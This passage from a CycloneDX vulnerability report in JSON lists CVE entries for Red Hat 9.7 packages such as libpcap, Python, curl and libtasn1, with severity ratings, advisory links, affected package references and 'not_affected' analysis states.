"urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-11961", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 1.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N" } ], "cwes": [ 122, 126 ], "description": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer. The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented. If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-11961" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-11961" }, { "url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11961" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-11961" } ], "published": "2025-12-31T01:15:54+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.7&epoch=14", "versions": [ { "version": "14:1.10.0-4.el9", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpcap@1.10.0-4.el9?arch=x86_64&distro=redhat-9.7&epoch=14" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-12781", "ratings": [ { "source": { "name": "nvd" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "cwes": [ 704 ], "description": "When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the \"base64\" module the characters \"+/\" will always be accepted, regardless of the value of \"altchars\" parameter, typically used to establish an \"alternative base64 alphabet\" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues.\n\n\n\n\nThis behavior can only be insecure if your application uses an alternate base64 alphabet (without \"+/\"). If your application does not use the \"altchars\" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet.\n\n\n\n\nThe attached patches DOES NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python.\u00a0Users are recommended to mitigate by verifying user-controlled inputs match the base64 \nalphabet they are expecting or verify that their application would not be \naffected if the b64decode() functions accepted \"+\" or \"/\" outside of altchars.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-12781" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-12781" }, { "url": "https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b" }, { "url": "https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947" }, { "url": "https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5" }, { "url": "https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76" }, { "url": "https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5" }, { "url": "https://github.com/python/cpython/issues/125346" }, { "url": "https://github.com/python/cpython/pull/141128" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12781" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-12781" } ], "published": "2026-01-21T20:16:04+00:00", "updated": "2026-02-02T17:25:23+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-13034", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 295 ], "description": "When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey`\nwith the curl tool,curl should check the public key of the server certificate\nto verify the peer.\n\nThis check was skipped in a certain condition that would then make curl allow\nthe connection without performing the proper check, thus not noticing a\npossible impostor. To skip this check, the connection had to be done with QUIC\nwith ngtcp2 built to use GnuTLS and the user had to explicitly disable the\nstandard certificate verification.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-13034" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-13034" }, { "url": "https://curl.se/docs/CVE-2025-13034.html" }, { "url": "https://curl.se/docs/CVE-2025-13034.json" }, { "url": "https://github.com/advisories/GHSA-9r76-qj98-jfhc" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13034" }, { "url": "https://ubuntu.com/security/notices/USN-8062-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-13034" } ], "published": "2026-01-08T10:15:45+00:00", "updated": "2026-01-20T14:54:02+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-13151", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 787 ], "description": "Stack-based buffer overflow in libtasn1 